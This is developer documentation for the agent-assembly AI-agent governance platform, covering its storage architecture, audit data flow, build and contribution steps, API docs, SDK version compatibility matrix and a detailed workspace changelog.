The gateway never talks to a concrete database directly — it goes through the aa-storage trait facade, and the active driver decides where bytes land.

flowchart TD
    GW["aa-gateway"] --> Facade["aa-storage<br/>trait facade + Registry"]
    Facade --> Cache["aa-cache<br/>L1Cache (cache-aside, TTL)"]
    Cache --> Driver{"active driver"}
    Driver --> Mem[("aa-storage-memory<br/>DashMap")]
    Driver --> PG[("aa-storage-postgres<br/>sqlx")]
    Driver --> Redis[("aa-storage-redis<br/>deadpool")]
    Driver --> SQLite[("aa-storage-sqlite-buffer<br/>local write-buffer")]

L1 cache. Read-heavy stores (e.g. the policy store) are fronted by aa-cache::L1Cache, a DashMap-backed cache-aside layer with TTL and stampede protection — concurrent misses for the same key collapse to one backend load.
Driver selection. aa-storage’s Registry + register_builtin_drivers resolves the configured backend at boot; aasm config validate and aasm config boot exercise this loader.
Audit storage shape. audit_entry_to_storage_event (aa-gateway/src/storage/audit_bridge.rs) maps a hash-chained AuditEntry into the storage AuditEvent keyed by event_id; the Postgres driver writes it as a metadata-only audit_logs row (no raw payloads — those were already dropped by the sanitizer).

Summary of the data’s journey

Stage	Component	Form of the data
Observe	L1/L2/L3 layer	agent action → `aa-proto` event
Normalise	`aa-runtime` pipeline	`EnrichedEvent`
Redact	`aa-runtime` enforcement	secrets scanned, oversized redacted whole
Decide	`aa-gateway` policy engine	`Allow` / `Deny` / `RequireApproval`
Record (sync)	`AuditWriter`	hash-chained JSONL line (+ optional dual sink)
Publish (async)	`audit_publisher` → NATS	`assembly.audit.<tenant>.<agent>`
Sanitise	`sanitizer::sanitize`	“never store” data stripped
Persist	`aa-storage-postgres`	`audit_logs` row, deduped by `event_id`

Last updated: 2026-06-11 by Chisanan232

Building & contributing

This page is the short version of building, testing, and linting the workspace. The authoritative source is CONTRIBUTING.md at the repo root; read it before opening a pull request.

Prerequisites

Rust stable (≥ 1.75) — install via rustup.
cargo-nextest — cargo install cargo-nextest (the test runner).
cargo-deny — cargo install cargo-deny (license / advisory checks).
Lefthook — brew install lefthook (macOS) or see the Lefthook install guide. The hook configuration lives in lefthook.toml.

Setup

git clone https://github.com/ai-agent-assembly/agent-assembly.git
cd agent-assembly

# Install git hooks (fmt, clippy, deny on commit; doc on push)
lefthook install

# Verify the workspace builds
cargo build --workspace

# Run the full test suite
cargo nextest run --workspace

Common commands

Task	Command
Build everything	`cargo build --workspace`
Full test suite	`cargo nextest run --workspace`
Tests for one crate	`cargo nextest run -p aa-gateway`
A single test	`cargo nextest run -p aa-gateway budget::types::tests::provider_variants_are_distinct`
Format	`cargo fmt --all`
Lint	`cargo clippy --all-targets -- -D warnings`
License / advisory check	`cargo deny check`
Docs	`cargo doc --workspace --no-deps`

Notes:

eBPF crates (aa-ebpf*) compile with target-specific toolchains; cargo check -p aa-ebpf is sufficient on non-Linux environments. The out-of-workspace BPF crates (aa-ebpf-probes, aa-ebpf-programs) are built by aa-ebpf/build.rs via aya-build and cannot be selected with cargo -p.
The CLI binary is aasm (shipped by aa-cli); smoke-test it with ./target/debug/aasm <subcommand>.

Faster builds (optional)

The dev profile already builds dependencies at opt-level = 1 with line-tables-only debuginfo, so warm rebuilds link faster while backtraces stay readable — no setup needed. A faster linker is opt-in: install it and uncomment the block for your platform in .cargo/config.toml (mold + clang on Linux, lld via brew install llvm on macOS).

Commit & branch conventions

Branches: <version>/<ticket-number>/<short-summary>, e.g. v0.0.1/AAASM-42/add_agent_registry.
Commits: Gitmoji-prefixed, <emoji> (<scope>): <imperative summary>, one logical unit per commit, bisectable. Example: ✨ (aa-core): Add AgentId newtype wrapper.

Adding a new crate

cargo new --lib aa-<name> from the repo root.
Add aa-<name> to the members array in the top-level Cargo.toml.
Inherit workspace metadata (version.workspace = true, etc.) and use the shared [workspace.lints.clippy] rather than redefining clippy lints per-crate.

Last updated: 2026-06-11 by Chisanan232

API reference

Build and browse the Rust API docs locally. The authoritative reference lives in rustdoc, generated directly from source — there is no hand-written API doc to drift out of date. Generate the whole workspace and open it in one command:

cargo doc --workspace --no-deps --open

The rest of this chapter covers the flags that matter and maps each crate to its rustdoc entry point.

Generating rustdoc locally

The whole-workspace rustdoc is built with cargo doc. The pre-push lefthook hook also runs this command, so the docs are guaranteed to compile on master.

# Build rustdoc for every workspace member without recursing into transitive deps.
cargo doc --workspace --no-deps

# Same, but also opens the index page in the default browser.
cargo doc --workspace --no-deps --open

# Document private items too — useful when working inside a single crate.
cargo doc -p aa-gateway --no-deps --document-private-items --open

The HTML output lands in target/doc/. Open target/doc/aa_core/index.html (or any other crate’s index) directly if you’d rather not use --open.

Note on eBPF crates — aa-ebpf* requires a nightly toolchain to build the BPF target. CI excludes these crates from the standard build matrix and validates them in a dedicated job. For rustdoc on macOS or non-Linux machines, run cargo doc --workspace --no-deps --exclude aa-ebpf to skip them.

Per-crate API surface

Once rustdoc is built (target/doc/<crate>/index.html), the most-frequented entry points are:

Crate	rustdoc entry	Highlights
`aa-core`	`target/doc/aa_core/index.html`	Domain newtypes (`AgentId`, `TeamId`), `ActionType` enum, common traits
`aa-proto`	`target/doc/aa_proto/index.html`	Generated protobuf message types — wire format source of truth
`aa-runtime`	`target/doc/aa_runtime/index.html`	Tokio runtime wrapper, agent lifecycle hooks
`aa-proxy`	`target/doc/aa_proxy/index.html`	MitM HTTPS proxy primitives
`aa-gateway`	`target/doc/aa_gateway/index.html`	Policy engine, agent registry, budget tracker
`aa-api`	`target/doc/aa_api/index.html`	HTTP layer with `utoipa`-generated OpenAPI spec
`aa-cli`	`target/doc/aa_cli/index.html`	`aasm` operator binary surface (clap commands)
`aa-sdk-client`	`target/doc/aa_sdk_client/index.html`	Shared SDK runtime-client (UDS transport, codec, lifecycle) the Python/Node/Go shims wrap
`aa-wasm`	`target/doc/aa_wasm/index.html`	wasm-bindgen surface for in-browser embedding
`conformance`	`target/doc/conformance/index.html`	Cross-SDK protocol vector harness

The HTTP API (served by aa-api) additionally publishes a generated OpenAPI v1 spec. Validate the spec with npx @stoplight/spectral-cli lint openapi/v1.yaml.

Hosted documentation (deferred)

Publishing rustdoc to docs.rs and the mdBook to GitHub Pages is out of scope for v0.0.1. Both are tracked as follow-up Stories under Epic AAASM-13. Until then, run cargo doc --workspace --no-deps --open and mdbook serve docs --open locally.

Last updated: 2026-06-11 by Chisanan232

Version Compatibility Matrix

This document tracks which versions of aa-runtime are compatible with each SDK version. Update this file whenever any component version changes — see CI enforcement below.

CI enforcement for SDK version changes is pending cross-repo CI integration. Until then, SDK version bumps must be accompanied by a manual update to this file.

Compatibility Matrix

`aa-runtime`	Python SDK (`aa-ffi-python`)	Node.js SDK (`aa-ffi-node`)	Go SDK (`aa-ffi-go`)	Protocol Version
v0.0.1-alpha.1	v0.0.1-alpha.1 (PyPI `0.0.1a1`) ✓	v0.0.1-alpha.1 ✓	v0.0.1-alpha.1 ✓	protocol/v1
v0.0.1-alpha.2	v0.0.1-alpha.2 (PyPI `0.0.1a2`) ✓	v0.0.1-alpha.2 ✓	v0.0.1-alpha.2 ✓	protocol/v1
v0.0.1-alpha.3	v0.0.1-alpha.3 (PyPI `0.0.1a3`) ✓	v0.0.1-alpha.3 ✓	v0.0.1-alpha.3 ✓	protocol/v1
v0.0.1	v0.0.1 ✓	v0.0.1 ✓	v0.0.1 ✓	protocol/v1

Legend:

✓ Compatible — fully supported
⚠️ Partial — works with known limitations (see notes)
✗ Incompatible — do not use together

Minimum Supported Runtime Version per SDK

SDK	Minimum `aa-runtime` Version
Python SDK (`aa-ffi-python`) v0.0.1	aa-runtime v0.0.1
Node.js SDK (`aa-ffi-node`) v0.0.1	aa-runtime v0.0.1
Go SDK (`aa-ffi-go`) v0.0.1	aa-runtime v0.0.1

Supported Protocol Versions per Runtime

A runtime version may support multiple protocol versions to allow SDK upgrades without simultaneous runtime upgrades.

`aa-runtime` Version	Supported Protocol Versions
v0.0.1-alpha.1	protocol/v1
v0.0.1-alpha.2	protocol/v1
v0.0.1-alpha.3	protocol/v1
v0.0.1	protocol/v1

Dual-URL SDK configuration

Starting with the v0.0.1 SDK line, every SDK accepts two endpoint fields so a single install can target either a single-host OSS deployment or a split enterprise deployment (gRPC gateway and HTTP control plane on different hosts).

Field (Python / Node / Go)	What it addresses	Scheme
`gateway_url` / `gatewayUrl` / `WithGatewayURL`	gRPC endpoint of the gateway	`host:port`, no scheme
`control_plane_url` / `controlPlaneUrl` / `WithControlPlaneURL`	HTTP base URL for the control plane — `aa-api` (OSS) or the FastAPI cloud (enterprise)	full URL with scheme

The HTTP control plane serves agent registration, policy checks, and topology edges (POST /agents/{id}/register, POST /agents/{id}/policy/check, POST /topology/edges). The gRPC transport carries the streaming op-control, lifecycle, audit, and approval flows and always reads gateway_url.

Backwards-compatible default

control_plane_url is optional. When it is not set, each SDK defaults it to the resolved gateway_url, so a single-host OSS dev install keeps working with only one endpoint configured — the pre-feature behaviour is preserved exactly. It only needs a distinct value when the HTTP control plane and the gRPC gateway live on separate hosts (the production enterprise topology).

Resolution order and environment variables

Each field resolves as explicit init argument > environment variable > unset:

Field	Environment variable
`gateway_url` / `gatewayUrl` / `WithGatewayURL`	`AA_GATEWAY_URL`
`control_plane_url` / `controlPlaneUrl` / `WithControlPlaneURL`	`AA_CONTROL_PLANE_URL`

If control_plane_url is still unset after this chain, it falls back to gateway_url as described above.

Canonical `AA_` prefix and the deprecated `AAASM_` alias

AA_* is the canonical environment-variable prefix across all SDKs — AA_GATEWAY_URL, AA_CONTROL_PLANE_URL, and AA_API_KEY. New configuration should always use this prefix.

The legacy AAASM_* prefix — used by the older zero-config gateway resolver in each SDK — is a deprecated alias. It is still honoured for backwards-compatibility, but reading a value from an AAASM_* variable emits a deprecation warning, and the alias will be removed in a future major version. Migrate to the AA_* names.

This prefix reconciliation is tracked across the SDKs under AAASM-3019; sibling subtasks update the Python, Node, and Go resolvers.

Per-SDK notes

Python (AAASM-2028) — control_plane_url is a keyword argument on init_assembly, threaded into GatewayClient (httpx). The gRPC path (op_control) continues to read gateway_url.
Node (AAASM-2029) — controlPlaneUrl is an optional field on AssemblyConfig. When set, the gateway client routes its HTTP traffic at it; the gRPC transport (op-control) keeps using gatewayUrl.
Go (AAASM-2030) — assembly.WithControlPlaneURL stores the value on the runtime options for parity with the other SDKs. The Go SDK has no HTTP control-plane caller today (lifecycle is delegated to the aasm runtime), so the field is in place ready for the first HTTP caller; gRPC dial behaviour is unchanged.

Authoritative strategy source

The enterprise-vs-OSS connectivity strategy — why the second field exists, the transport split, and the per-SDK survey — is owned by agent-assembly-enterprise/docs/sdk-compatibility.md (filed under AAASM-1953). This section documents the OSS-visible surface of that convention; the enterprise doc is the authoritative source for the strategy.

CI Enforcement

A CI check (compat-matrix-check) enforces that this file is updated whenever version-carrying files change in a pull request.

Currently enforced (monorepo scope):

Cargo.toml (workspace root)
crates/*/Cargo.toml (all crate manifests)

Deferred — pending cross-repo CI integration:

sdk/python/pyproject.toml (Python SDK)
sdk/node/package.json (Node.js SDK)
sdk/go/go.mod (Go SDK)

Until cross-repo CI exists, SDK version bumps require a manual update to this file before merging.

How to Update This File

When bumping a component version:

Add a new row to the Compatibility Matrix table for the new version combination.
Update the Minimum Supported Runtime Version table if the minimum changes.
Update the Supported Protocol Versions table if the runtime adds or drops protocol version support.
Commit the change in the same PR as the version bump.

See versioning.md for the full versioning and deprecation policy.

Workspace changes (non-version bumps)

PR / Ticket	Change	Compatibility impact
AAASM-107	Added `conformance` workspace crate (test infrastructure, not shipped)	None — internal tooling only
AAASM-39	Added `aa-ebpf-common` workspace crate (shared eBPF types, not shipped standalone)	None — internal shared types only
AAASM-37	Added `aa-ebpf-common` workspace crate (no_std shared eBPF event types, not shipped as a public API)	None — internal kernel/userspace bridge only
AAASM-39 (impl)	Added exec tracepoint BPF programs, ProcessLineageTracker, ShellDetector, ExecLoader in `aa-ebpf`	None — kernel-level monitoring, not a public API
AAASM-64	Added `aa-ffi-go` workspace crate (Go C-ABI staticlib bindings)	None — new FFI crate, no existing API changes
AAASM-936	Added `examples/aa-devtool-sample-myeditor` workspace crate (sample `DevToolAdapter` impl + plugin authoring reference; `publish = false`)	None — example only, not shipped, depends on existing `aa-core` API surface
AAASM-971	Added `aa-devtool-codex` workspace crate (OpenAI Codex CLI `DevToolAdapter` implementation; `detect()` + `governance_level()` wired in this PR; `generate_managed_settings`, `apply_settings`, `build_launch_command` land in AAASM-978/983/988)	None — new adapter crate, no changes to existing public APIs
AAASM-204	Added `aa-devtool-windsurf` workspace crate (`DevToolAdapter` for Windsurf Cascade; L2 governance via admin settings + MCP registry control; `publish = false`)	None — new adapter crate, no changes to existing public API surface
AAASM-997	Added `aa-devtool-copilot` workspace crate (`DevToolAdapter` for GitHub Copilot — VS Code extension detection, `publish = false`); added `semver` v1 dependency for latest-version selection	None — new adapter crate, no changes to existing public API surface
AAASM-1006	Implemented MCP governance in `aa-devtool-copilot`: `list_mcp_servers()` reads `chat.mcp.servers` from VS Code `settings.json`; `apply_mcp_governance()` filters the server set (keep allowed, remove denied) and sets `chat.mcp.requireApproval: "always"` when deny list is non-empty; `build_launch_command()` returns `LaunchFailed` (Copilot is IDE-resident, not CLI-launchable)	None — implementation only within existing `aa-devtool-copilot` crate; no new crates, no existing public API changes
AAASM-946	Added `aa-devtool-claude-code` workspace crate (`ClaudeCodeAdapter` — detection layer for Claude Code CLI; `publish = false` pending AAASM-201 completion)	None — new crate, no existing API surface changed; depends on existing `aa-core::DevToolAdapter` trait
AAASM-918	Added `aa-devtool-saas` workspace crate (SaaS coding-agent `DevToolAdapter` for Claude.ai, ChatGPT, Cursor cloud; L1Observe governance; HMAC-SHA256 webhook signature verification; MCP allowlist advisory overlay for Claude.ai; `publish = false`)	None — new adapter crate, no changes to existing public APIs
AAASM-205	Added `aa-devtool` workspace crate (`DiscoveryService` + built-in adapters for Claude Code, Codex, GitHub Copilot, Windsurf)	None — new crate, no existing API changes; `aa-api` and `aa-cli` gain a new optional dependency on it
AAASM-949	Added RBAC role enforcement on `POST /api/v1/policies`: `CallerRole` + `MutationKind` + `PolicyScopeKind` enums and `required_role_for()` in `aa-gateway/src/policy/rbac.rs`; `PolicyWriteAuth` extractor + `PolicyAuthorizationDenied` error in `aa-api/src/auth/policy_auth.rs`; optional `scope` field on `CreatePolicyRequest`; auto-generated `docs/src/policy-rbac.md` + `.ci/check-policy-rbac-doc.sh`	`POST /api/v1/policies` now requires authentication (401 when unauthenticated) and returns 403 when the caller’s role is insufficient for the target scope; `CreatePolicyRequest` gains an optional `scope` field (defaults to `global`). Read-only endpoints unchanged.
AAASM-956	Restored `aa-devtool`, `aa-devtool-claude-code`, `aa-devtool-codex`, `aa-devtool-saas`, and `aa-devtool-windsurf` to workspace `members` (dropped by a prior merge conflict resolution); implemented `apply_settings()` and `apply_mcp_governance()` in `aa-devtool-claude-code` via new `apply.rs` module (`SettingsPathResolver` trait, atomic write, unmanaged-key merge)	None — workspace member restoration only; `apply_settings`/`apply_mcp_governance` are internal adapter implementations with no changes to existing public API surfaces
AAASM-1206	Added `[profile.release]` to workspace `Cargo.toml` (`opt-level="z"`, `lto=true`, `codegen-units=1`, `strip=true`, `panic="abort"`) — build profile change only, no version bump	None — affects binary size of release builds only; no API, protocol, or ABI changes
AAASM-1076	Added `aa-topology-integration-tests` workspace crate (in-process end-to-end test harness for the topology pipeline; `publish = false`, dev-dependencies only)	None — test-only crate, no shipped artifacts; depends on existing `aa-api` / `aa-gateway` / `aa-runtime` public surfaces with no API changes
AAASM-1448	Renamed `aa-topology-integration-tests` workspace crate to `aa-integration-tests` (in preparation for AAASM-1258 CLI subcommand coverage). Renamed `.github/workflows/topology-integration.yml` to `integration-tests.yml`.	None — test-only crate, no shipped artifacts; dev-dependencies only; no public API change
AAASM-1419	Added `CallStackNode` proto message + `repeated CallStackNode call_stack = 28` field on `AuditEvent`; added `CallStackNode` to `aa-api` `ViolationPayload::Audit` (utoipa schema regenerated); wired through dashboard `useLiveOpsStream.mapEvent`	None on `protocol/v1` — non-breaking proto field addition (default empty). SDK regeneration for `aa-ffi-python` / `aa-ffi-node` / `aa-ffi-go` tracked as separate follow-up Tasks against this revision; older SDKs continue to interoperate (the new field is ignored on decode).
AAASM-2015	Added `aa-sandbox` workspace crate (wasmtime + wasmtime-wasi host runtime scaffold for F116 ST-W tool-execution sandbox; doc-only modules `error`, `policy`, `runtime` — real WASI host wiring lands in AAASM-2017, fuel + memory-store limits in AAASM-2018)	None — new internal crate, no public API or protocol change; `aa-wasm` browser-target stub untouched
AAASM-2340	Workspace prepared for crates.io publish via `cargo-workspaces` topological order. Per-crate `publish` flags set: publishable (default) for `aa-core`, `aa-proto`, `aa-runtime`, `aa-ebpf`, `aa-ebpf-common`, `aa-proxy`, `aa-sandbox`, `aa-gateway`, `aa-cli`; `publish = false` for all `aa-devtool` (dev-tool subsystem held back from this alpha — not yet feature-complete), all `aa-ffi-` + `aa-wasm` (SDK FFI scaffolding — each language SDK repo carries its own copy and ships via PyPI / npm / Go module proxy), and `aa-api` / `conformance` / `aa-integration-tests` / `examples/` (cloud/enterprise consumers + workspace-internal tooling). All publishable crates’ path-deps gained explicit `version = "0.0.1-alpha.3"` literals so `cargo publish` manifest verification passes. `release.yml` `publish-crate` job replaced with `publish-crates` (cargo-workspaces). Sibling content bundled into crate tarballs via `_embedded/` mirrors so `cargo install aasm` ships the full product — `aa-cli/_embedded/dashboard/dist/` (real SPA, not stub), `aa-proto/_embedded/proto/` (gRPC contract), `aa-ebpf/_embedded/aa-ebpf-probes/` (BPF source, compiled at install time when nightly + bpfel target are present, otherwise graceful stubs). New `aasm sandbox run` / `aasm sandbox info` subcommands expose the WASI tool-execution sandbox (highlight ④ of the product spec) to OSS users. Source tree keeps the full `aasm` surface including `run` and `tools`; the `.ci/strip-for-publish.sh` script removes the held-back `aa-devtool` deps and the two consuming source files from the working tree right before `cargo workspaces publish` runs (driven by `strip-for-publish:begin` / `:end` markers in `aa-cli/Cargo.toml` and `aa-cli/src/commands/mod.rs`). Restores `cargo install aasm` as a supported install path. Resolves AAASM-2094 the right way (supersedes the closed AAASM-2338 / PR #840).	Behavior delta — published `aasm` binary on crates.io omits the `run` and `tools` subcommands. Local source builds (`cargo build -p aa-cli`) expose the full surface unchanged. To restore the subcommands on crates.io once dev-tool ships, remove the strip step from `release.yml` and flip the three `aa-devtool*` crates’ `publish` flags. No public Rust API, protocol, or ABI changes; new `aasm sandbox` CLI surface is additive. At 0.x.y SemVer, internal crates carry no API stability commitment; READMEs note ‘internal use only’.
AAASM-2343	Bumped workspace + 22 path-dep version literals from `0.0.1-alpha.3` to `0.0.1-alpha.4`. Fourth pre-release in the v0.0.1 dry-run series. Verifies AAASM-2340 (cargo-workspaces topological publish — first `cargo install aasm` ever), AAASM-2339 (curl smoke channel gated with `if: false`), and AAASM-2336 (notify-downstream → node-sdk + python-sdk repository_dispatch, supersedes AAASM-2328 retry workaround). Companion python-sdk listener AAASM-2342 lands in the same release cycle.	None — pre-release version bump; AAASM-2340 behaviour delta (held-back `aasm run` / `aasm tools` on crates.io) carries forward unchanged.
AAASM-2461	Bumped workspace + 22 path-dep version literals from `0.0.1-alpha.4` to `0.0.1-alpha.5`. Fifth pre-release in the v0.0.1 dry-run series. Validates the full release pipeline end-to-end with all alpha-4 recovery fixes baked in: AAASM-2346 (`cargo workspaces publish --allow-dirty`), AAASM-2455 / AAASM-2457 (smoke matrix restructure), AAASM-2456 (RUNBOOK + `release-readiness.sh` + per-channel aggregator), plus SDK companions node-sdk#67 (AAASM-2344) and python-sdk#74/#75/#76 (AAASM-2345 / AAASM-2459 / AAASM-2460). On crates.io, `aa-core` re-publishes at `0.0.1-alpha.5` alongside its existing `0.0.1-alpha.4` row from the partial alpha-4 publish; the other 8 crates publish for the first time.	None — pre-release version bump; AAASM-2340 behaviour delta (held-back `aasm run` / `aasm tools` on crates.io) carries forward unchanged.
AAASM-2767	Bumped workspace + 35 path-dep version literals from `0.0.1-alpha.5` to `0.0.1-alpha.6`. Sixth pre-release in the v0.0.1 dry-run series. Re-runs the full release pipeline with the two alpha-5 recovery fixes baked in: AAASM-2463 commit 1 (PR #871 — `--no-verify` on `cargo workspaces publish`, bypassing the `cargo publish --verify` source-mutation guard that `aa-ebpf/build.rs`’s `Cargo.toml.embedded` rename tripped) and AAASM-2463 commit 2 (PR #871 — removed the `smoke-test:` job that raced `publish-crates` and the homebrew tap PR merge). On crates.io, `aa-core` / `aa-proto` / `aa-ebpf-common` re-publish at `0.0.1-alpha.6` alongside their existing `0.0.1-alpha.5` rows from the partial alpha-5 publish; the other 6 crates (`aa-ebpf`, `aa-runtime`, `aa-proxy`, `aa-sandbox`, `aa-gateway`, `aa-cli`) publish for the first time.	None — pre-release version bump; AAASM-2340 behaviour delta (held-back `aasm run` / `aasm tools` on crates.io) carries forward unchanged.
AAASM-2786	Bumped workspace + 35 path-dep version literals from `0.0.1-alpha.6` to `0.0.1-alpha.7`. Seventh pre-release in the v0.0.1 dry-run series. Re-runs the full release pipeline with the AAASM-2775 strip-for-publish fix baked into master (PR #1021 — wrapped `aa-integration-tests/Cargo.toml`’s `audit-consumer = ["aa-gateway/audit-consumer"]` feature forward in `strip-for-publish:begin audit-consumer` / `:end` markers and added the file to `MARKED_FILES` in `.ci/strip-for-publish.sh`; the alpha-6 `publish-crates` failed at the cargo-workspaces resolver because the workspace graph still referenced the stripped feature). Also benefits from two companion SDK-workflow settings fixes applied via API: org-level “Allow GitHub Actions to create/approve PRs” enabled (unblocks node-sdk’s docs-version PR step), and go-sdk’s `github-pages` env adds a `v*` tag deployment policy (unblocks Pages deployment on tag pushes). On crates.io, `aa-core` / `aa-proto` / `aa-ebpf-common` re-publish at `0.0.1-alpha.7` alongside their existing `0.0.1-alpha.5` rows (the alpha-6 retries failed); the other 6 crates publish for the first time.	None — pre-release version bump; AAASM-2340 behaviour delta (held-back `aasm run` / `aasm tools` on crates.io) carries forward unchanged.
AAASM-2805	Bumped workspace + 35 historical path-dep version literals AND 8 newly added storage/cache path-dep version literals (AAASM-2797 / PR #1024) from `0.0.1-alpha.7` to `0.0.1-alpha.8`. Eighth pre-release in the v0.0.1 dry-run series. Re-runs the full release pipeline with the AAASM-2797 fix baked into master — 5 storage/cache crates (`aa-storage`, `aa-storage-memory`, `aa-storage-redis`, `aa-storage-sqlite-buffer`, `aa-cache`) had path-deps without the `version = "..."` literal that cargo publish demands. alpha-7’s `publish-crates` died after publishing only `aa-core@0.0.1-alpha.7` because of this latent bug. On crates.io, all 14 publishable crates are expected to land for the first time end-to-end: the 9 historical (re-publish at alpha-8 alongside existing rows) plus the 5 storage/cache crates (publish for the first time ever). Still-open follow-up: Homebrew `brew install + test (macOS)` silent-SIGKILL investigation (the AAASM-2792 revert didn’t fix it; `--release` post-AAASM-2575 is the fast profile, not size-optimized; suspect is a new transitive dep added since alpha-5 such as redis 1.2 / deadpool-redis 0.23 via aa-storage-redis).	None — pre-release version bump; AAASM-2340 behaviour delta (held-back `aasm run` / `aasm tools` on crates.io) carries forward unchanged.
AAASM-2849	Bumped workspace + 43 path-dep version literals from `0.0.1-alpha.8` to `0.0.1-alpha.9`. Ninth pre-release in the v0.0.1 dry-run series. First coordinated release after the AAASM-2851 SDK release decoupling chapter — validates that the `repository_dispatch` fan-out still works end-to-end after the restructure of `release-node.yml` (publish_mode gating, dry-run input, Resolve refactor) and `release-python.yml` (resolve job, sync-version composite action rename). Carries agent-assembly docs polish (AAASM-2199, 2827, 2833, 2841, 2858) and drives `@agent-assembly/sdk@0.0.1-alpha.9` (full AAASM-2851 chain + AAASM-2842 public GatewayClient + AAASM-2870 README polish) and `agent-assembly==0.0.1a9` (symmetric python-sdk content + AAASM-2863 PEP 440 test + AAASM-2868 docs CI gate + AAASM-2869 runbook) downstream via repository_dispatch. On crates.io, all 14 publishable crates re-publish at `0.0.1-alpha.9` alongside their existing `0.0.1-alpha.8` rows.	None — pre-release version bump; AAASM-2340 behaviour delta (held-back `aasm run` / `aasm tools` on crates.io) carries forward unchanged.
AAASM-2951	Bumped workspace + 16 path-dep version literals from `0.0.1-alpha.9` to `0.0.1-beta.1`. First beta-channel pre-release in the v0.0.1 series — promotes the pre-release channel up from alpha after the alpha-1 → alpha-9 dry-run series stabilised every release channel. Coordinated release across agent-assembly + python-sdk + node-sdk + go-sdk; drives `@agent-assembly/sdk@0.0.1-beta.1`, `agent-assembly==0.0.1b1`, and `github.com/ai-agent-assembly/go-sdk@v0.0.1-beta.1` downstream. Carries the AAASM-2934 SDK Examples documentation chapter (multi-page Examples sections in the node/python/go SDK docs + an agent-assembly core-docs Examples pointer). On crates.io, all 14 publishable crates re-publish at `0.0.1-beta.1` alongside their existing `0.0.1-alpha.9` rows.	None — pre-release version bump; AAASM-2340 behaviour delta (held-back `aasm run` / `aasm tools` on crates.io) carries forward unchanged.
AAASM-3004	Bumped workspace + 16 path-dep version literals from `0.0.1-beta.1` to `0.0.1-beta.2`. Second pre-release in the v0.0.1 beta channel — a forward-roll cut on top of `0.0.1-beta.1` (no channel promotion, no scope expansion) carrying the AAASM-3000 IPC deadlock fix in `aa-sdk-client` (event reporting is now fire-and-forget, closing the deadlock against a runtime that doesn’t ack) plus the AAASM-2959 release-tooling sync that keeps `aa-ffi-python` and `aa-ffi-node` `Cargo.lock` consistent with the bumped `aa-sdk-client` revision. Coordinated release across agent-assembly + python-sdk + node-sdk + go-sdk; drives `@agent-assembly/sdk@0.0.1-beta.2`, `agent-assembly==0.0.1b2`, and `github.com/ai-agent-assembly/go-sdk@v0.0.1-beta.2` downstream. On crates.io, all 14 publishable crates re-publish at `0.0.1-beta.2` alongside their existing `0.0.1-beta.1` rows.	None — pre-release version bump + a behaviour-preserving deadlock fix on the SDK event-report path (the prior code blocked on an ack that the runtime didn’t send; consumers that already worked still work). AAASM-2340 behaviour delta (held-back `aasm run` / `aasm tools` on crates.io) carries forward unchanged.
AAASM-2372	Added `aa-storage-redis` workspace crate (Redis L2 shared-cache driver implementing `SessionStore`, `RateLimitCounter`, and `PolicyStore` from `aa-core::storage`; `redis` 1.2 + `deadpool-redis` 0.23 pooling; `RateLimitCounter` uses an atomic Lua `INCRBY`+`EXPIRE` script). No version change.	None — new driver crate, no changes to existing public API surface. `xxhash-rust` BSL-1.0 (transitive via `redis`) is already allow-listed in `deny.toml`.
AAASM-2369	Added `aa-storage-postgres` workspace crate (L3 primary PostgreSQL storage driver — ships sqlx migrations for the four MVP tables `orgs`/`agents`/`policies`/`audit_logs` and a `[storage.postgres]` connection-pool config; `publish = false` until the storage-driver subsystem is feature-complete). The `aa_core::storage` trait impls (`PgPolicyStore` / `PgAuditSink` / `PgCredentialStore` / `PgLifecycleStore`) land in AAASM-2370. No version change.	None — new internal driver crate; no existing public API, protocol, or ABI change
AAASM-2575	Split the default `[profile.release]` into a fast build (`opt-level=2`, `lto="thin"`, `codegen-units=16`; `strip` + `panic="abort"` unchanged) and added a size-optimized `[profile.dist]` (inherits `release`; `opt-level="z"`, fat `lto`, `codegen-units=1`). `release.yml` now ships the binary with `--profile dist`. Build-profile change only, no version bump.	None — affects build speed and which profile produces the shipped binary; `dist` reproduces the previous size-optimized output. No API, protocol, or ABI change.
AAASM-2555	Added a `[workspace.dependencies]` table to the root `Cargo.toml` centralizing third-party crates shared by ≥2 members, and converted those members to `dep = { workspace = true }` (single source of version truth). Pure manifest refactor — `Cargo.lock` byte-for-byte unchanged and `cargo tree -d` identical to the prior revision (108 duplicate nodes); no version bump. Single-member and intentionally-pinned crates (e.g. `rusqlite` per AAASM-2374) stay declared locally.	None — no version, protocol, or ABI change; resolved dependency graph is identical, so runtime behavior is unchanged
AAASM-2588	Added `[profile.dev]` (`debug="line-tables-only"`) and `[profile.dev.package."*"]` (`opt-level=1`, `debug=false`) to tune dev/test build time, plus an opt-in (commented) `.cargo/config.toml` faster-linker template and a `CONTRIBUTING.md` section. Raised the `integration-tests` job `timeout-minutes` 20→30 to absorb the slightly heavier optimized-deps build. Build-config change only, no version bump.	None — affects local/CI build speed and dev-build debuginfo verbosity only; no API, protocol, or ABI change.
AAASM-2623	Added `aa-sdk-client` workspace crate (Story AAASM-2570 — the shared, FFI-agnostic SDK runtime-client: UDS transport, IPC wire codec, `AssemblyClient` lifecycle, and advisory non-authoritative credential preflight, extracted from `aa-ffi-python`). Scaffold only in this PR (`publish = false` until AAASM-2559 makes the shared crates pinnable); modules land in AAASM-2624/2625/2626. `aa-ffi-python` is untouched — its migration onto this crate is AAASM-2561.	None — new internal crate, no existing public API, protocol, or ABI change
AAASM-2646	Removed the fat `aa-ffi-python` + `aa-ffi-node` members from root `Cargo.toml` and deleted the crates (Epic AAASM-2552 final story). The thin Node/Python shims now live in the sibling `node-sdk` / `python-sdk` repos on the pinned `aa-sdk-client` (AAASM-2560 / AAASM-2561); `aa-ffi-go` (C-ABI staticlib artifact consumed by go-sdk) and `aa-sdk-client` are retained, as is `workspace.exclude = ["node-sdk"]` (the `e2e_sdk_node` tests still build the sibling thin shim). Shrinks `cargo build --workspace` by dropping the pyo3 / napi / napi-derive / napi-build dep subtrees.	None — workspace member removal only; the Python/Node/Go SDKs ship from their own repos and keep their versions + protocol/v1 compatibility. No aa-runtime version, protocol, or ABI change
AAASM-2703	Removed the `aa-ffi-go` member from root `Cargo.toml`, deleted the crate, and deleted its `ffi-go-staticlib.yml` build workflow (Epic AAASM-2552). The thin Go cgo shim now lives in the sibling `go-sdk` repo (`native/aa-ffi-go`) on the pinned `aa-sdk-client` (AAASM-2704), matching the Node/Python model — the monorepo no longer hosts any FFI shim. Amends ADR 0002 (which had kept `aa-ffi-go` in the workspace).	None — workspace member removal only; the Go SDK ships from its own repo and keeps its version + protocol/v1 compatibility. No aa-runtime version, protocol, or ABI change
